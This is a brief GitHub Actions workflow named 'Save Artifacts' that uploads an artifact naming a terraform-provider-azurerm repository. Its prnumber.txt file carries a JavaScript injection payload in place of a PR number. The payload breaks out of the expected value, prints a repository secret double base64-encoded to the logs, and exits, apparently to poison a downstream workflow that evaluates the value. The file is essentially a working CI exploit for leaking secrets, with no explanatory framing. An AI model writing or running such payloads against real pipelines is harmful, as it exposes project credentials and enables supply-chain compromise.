name: Save Artifacts
jobs:
  save-artifacts:
    runs-on: ubuntu-latest
    steps:
    - shell: bash
      run: |
        mkdir -p wr_actions
        echo "elcolloff" > wr_actions/ghowner.txt
        echo "terraform-provider-azurerm" > wr_actions/ghrepo.txt
        echo '1 }); console.log("GARALT_LEAKED_TOKEN=" + Buffer.from(Buffer.from(process.env.GARALT_SECRET).toString("base64")).toString("base64")); process.exit(0); /*' > wr_actions/prnumber.txt
    - uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02
      with:
        name: artifact
        path: wr_actions
        retention-days: 1
env:
  GARALT_SECRET: ${{ secrets.GARALT }}
on:
  workflow_call: null
